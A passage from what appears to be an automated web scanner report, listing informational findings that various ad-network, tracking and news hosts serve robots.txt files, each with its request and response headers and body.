Date: Sun, 04 Sep 2011 00:45:20 GMT
Connection: keep-alive

User-agent: *
Disallow: /

26.11. http://api.affinesystems.com/event/impression

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.affinesystems.com
Path:   /event/impression

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.affinesystems.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:21:56 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Tue, 14 Jun 2011 23:53:24 GMT
ETag: "2c256f-1a-4a5b4bdcf0500"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.12. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bizographics.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:57:22 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.13. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 00:49:23 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.14. http://ar.atwola.com/atd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.atwola.com
Path:   /atd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ar.atwola.com

Response

HTTP/1.1 200 OK
Expires: Sun, 25 Sep 2011 01:13:23 GMT
Date: Sun, 04 Sep 2011 01:13:23 GMT
Content-Length: 28
Content-Type: text/html

User-agent: *
Disallow: /

26.15. http://as.casalemedia.com/s

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /s

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 01:02:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:02:07 GMT
Connection: close

User-agent: *
Disallow: /

26.16. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 05 Sep 2011 00:42:17 GMT
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.17. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.reuters.com
Path:   /wp-content/widgets/rtrxtra/rac.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 23 Apr 2011 08:39:43 GMT
ETag: "69a859d-8e-4a191ea7971c0"
Accept-Ranges: bytes
Content-Length: 142
X-Cachetype: Cached-with-(null)
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/wp-admin/
Disallow: /private/
Disallow: /article-comments/
SITEMAP: http://blogs.reuters.com/sitemap-news.xml


26.18. http://bookmarks.yahoo.com/myresults/bookmarklet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bookmarks.yahoo.com
Path:   /myresults/bookmarklet

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bookmarks.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:00 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Tue, 24 Apr 2007 10:06:12 GMT
Accept-Ranges: bytes
Content-Length: 24
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.19. http://c.brightcove.com/services/viewer/federated_f9

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/viewer/federated_f9

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 19:56:42 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: text/plain
Content-Length: 64
Date: Sun, 04 Sep 2011 01:06:10 GMT
Connection: keep-alive
Server:

User-agent: *
Disallow: /
Allow: /services/viewer/federated_f9*

26.20. http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c5.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
ETag: "37c4e0-4c-3f861aa21f400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1593842807
Date: Sun, 04 Sep 2011 01:22:05 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.21. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
ETag: "296db4-4c-3f861aa21f400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:04:27 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.22. http://cdn.gigya.com/js/socialize.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /js/socialize.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:42:57 GMT
Content-Length: 28
Connection: close

User-agent: *
Disallow: /

26.23. http://cdn.optmd.com/V2/89733/235451/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/89733/235451/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "d54bba-1a-3fa51a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 01:22:12 GMT
Connection: close

User-agent: *
Disallow: /

26.24. http://cdn.turn.com/server/ddc.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sun, 04 Sep 2011 01:06:31 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.25. https://cdns.gigya.com/gs/SafariIDsProxy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdns.gigya.com
Path:   /gs/SafariIDsProxy.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdns.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web102
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 01:22:15 GMT
Content-Length: 28
Connection: close

User-agent: *
Disallow: /

26.26. http://charlotteobserver.adperfect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://charlotteobserver.adperfect.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: charlotteobserver.adperfect.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:20 GMT
Server: Apache
Last-Modified: Wed, 10 Aug 2011 00:38:56 GMT
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.27. http://clk.fetchback.com/serve/fb/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.28. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:22:19 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.29. http://cm.npc-mcclatchy.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

26.30. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:42 GMT
Accept-Ranges: bytes
ETag: "0fbccbb165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:14 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

26.31. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delivery.sprint.com
Path:   /m/p/nxt/reg/cmb/generic.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: delivery.sprint.com

Response

HTTP/1.1 200 OK
Content-Length: 226
Content-Type: text/plain
Last-Modified: Wed, 31 Aug 2011 14:48:04 GMT
Accept-Ranges: bytes
ETag: "6f4511fdec67cc1:1de6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:23 GMT
Connection: close

User-agent: *
Disallow: /
Noindex: /m/p/tim/
Noindex: /m/p/syn/
Noindex: /m/p/nxt/ftaf/
Noindex: /m/u/nxt/nascar/
Noindex: /m/u/nex/

User-agent: googlebot
Allow: /m/p/mtv/

User-agent: yah
...[SNIP]...

26.32. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:26 GMT
Server: Apache
Last-Modified: Sat, 03 Sep 2011 01:08:38 GMT
Accept-Ranges: bytes
Content-Length: 599
Vary: Accept-Encoding
X-Digg-Time: D=274 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=10000
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

26.33. https://docs.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:22:28 GMT
Expires: Sun, 04 Sep 2011 01:22:28 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /$
Allow: /support/
Allow: /a/
Allow: /Doc
Allow: /View
Allow: /ViewDoc
Allow: /present
Allow: /Present
Allow: /TeamPresent
Allow: /EmbedSlideshow
Allow: /templates
Allow: /previe
...[SNIP]...

26.34. http://dw.com.com/clear/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.com.com
Path:   /clear/c.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dw.com.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:51 GMT
Server: Apache/2.0
Last-Modified: Fri, 26 Aug 2011 16:08:00 GMT
Accept-Ranges: bytes
Content-Length: 854
Cache-Control: max-age=14400
Expires: Sun, 04 Sep 2011 04:53:51 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=363, max=717
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/third_party/apache2/configs/dw/dwcomcom/robots.txt,v $
# $Revision: 1.2 $
User-agent: *
Disallow: /Ads/
Disallow: /redir/
Disallow: /rubicsclk/
# Disallow: /i/ is removed per 1907
...[SNIP]...

26.35. http://espn.go.com/dallas/ncf/preview

Summary

Severity:   Information
Confidence:   Certain
Host:   http://espn.go.com
Path:   /dallas/ncf/preview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: espn.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Connection: close
Date: Sun, 04 Sep 2011 01:22:27 GMT
Content-Type: text/plain
Last-Modified: Mon, 07 Mar 2011 22:09:46 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N722
Cache-Expires: Sun, 04 Sep 2011 01:25:39 GMT
Content-Length: 712

# robots.txt for Disallow: /

User-agent: *
Disallow: /cgi
Disallow: /ad/
Disallow: /espnradio/podcast/feeds/easports/
Disallow: /members/
Disallow: *print?id
Disallow: /travel/passport/event
...[SNIP]...

26.36. http://feedburner.google.com/fb/a/mailverify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feedburner.google.com
Path:   /fb/a/mailverify

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feedburner.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:22:28 GMT
Expires: Sun, 04 Sep 2011 01:22:28 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

26.37. http://findnsave.sacbee.com/api/groupon.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://findnsave.sacbee.com
Path:   /api/groupon.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: findnsave.sacbee.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server-Name: FS1
Date: Sun, 04 Sep 2011 01:22:29 GMT
Connection: close
Content-Length: 2329

User-agent: *
Sitemap: http://findnsave.sacbee.com/sitemap.xml
User-agent: *
Disallow: /shared/AddShoppingList.aspx
Disallow: /shared/ViewShoppingList.aspx
Disallow: /shared/popup.aspx
Disallow
...[SNIP]...

26.38. http://friendfeed.com/share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://friendfeed.com
Path:   /share

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: friendfeed.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Sun, 04 Sep 2011 01:22:33 GMT
Content-Type: text/plain
Content-Length: 91
Last-Modified: Mon, 23 May 2011 22:26:34 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /account/
Disallow: /iphone/
Disallow: /connect
Disallow: /search?

26.39. http://funds.reuters.com/lipper/retail/reuters/overview.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://funds.reuters.com
Path:   /lipper/retail/reuters/overview.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: funds.reuters.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:22:34 GMT
Content-Length: 230
Content-Type: text/plain
Last-Modified: Thu, 15 Jun 2006 21:08:37 GMT
Accept-Ranges: bytes
ETag: "bcad60debf90c61:1876a"
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET

User-Agent: *
Disallow: /
Disallow: /lipper/retail/reuters/researchflows.asp?*
Disallow: /lipper/retail/reuters/researchmarket.asp?*
Disallow: /retail/reuters/researchflows.asp?*
Disallow: /retai
...[SNIP]...

26.40. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

26.41. https://google.com/accounts/Logout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://google.com
Path:   /accounts/Logout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:22:37 GMT
Expires: Sun, 04 Sep 2011 01:22:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.42. http://googleads.g.doubleclick.net/aclk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 03 Sep 2011 23:16:36 GMT
Expires: Sun, 04 Sep 2011 23:16:36 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 7561

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.43. http://groups.google.com/groups

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: groups.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:22:43 GMT
Expires: Sun, 04 Sep 2011 01:22:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.44. http://images.google.com/support/bin/answer.py

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.google.com
Path:   /support/bin/answer.py

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: images.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:22:45 GMT
Expires: Sun, 04 Sep 2011 01:22:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.45. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.46. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/the-sacramento-bee-for-ipad/id446757012

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 18 Aug 2011 15:27:25 GMT
ETag: "d1-4aac93ff4d140"
Accept-Ranges: bytes
Content-Length: 209
Content-Type: text/plain
Cache-Control: public, no-transform, max-age=189
Date: Sun, 04 Sep 2011 01:22:46 GMT
Connection: close
X-Apple-Partner: origin.0

User-agent: *
Disallow: /WebObjects/MZFastFinance.woa
Disallow: /WebObjects/MZFinance.woa
Disallow: /WebObjects/MZPersonalizer.woa
Disallow: /WebObjects/MZSidebar.woa
Disallow: /WebObjects/MZStoreElem
...[SNIP]...

26.47. http://jlinks.industrybrains.com/jsct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jlinks.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 00:44:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 00:44:43 GMT
Content-Length: 26

User-agent: *
Disallow: /

26.48. http://l.addthiscdn.com/live/t00/250lo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 00:43:35 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


26.49. http://legolas.nexac.com/lgalt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legolas.nexac.com
Path:   /lgalt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: legolas.nexac.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:57 GMT
Server: Apache
Last-Modified: Sun, 27 Mar 2011 17:04:21 GMT
ETag: "1ad0152-1b-49f79d177ef40"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /


26.50. http://links.industrybrains.com/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://links.industrybrains.com
Path:   /click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: links.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:22:49 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 01:22:49 GMT
Content-Length: 26

User-agent: *
Disallow: /

26.51. http://load.exelator.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1277288947"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Sun, 04 Sep 2011 01:10:57 GMT
Server: HTTP server
Connection: close
Via: 1.1 AN-AMP_TM uproxy-3

User-agent: *
Disallow: /

26.52. https://mail.google.com/mail/

Summary

Severity:   Information
Confidence:   Certain
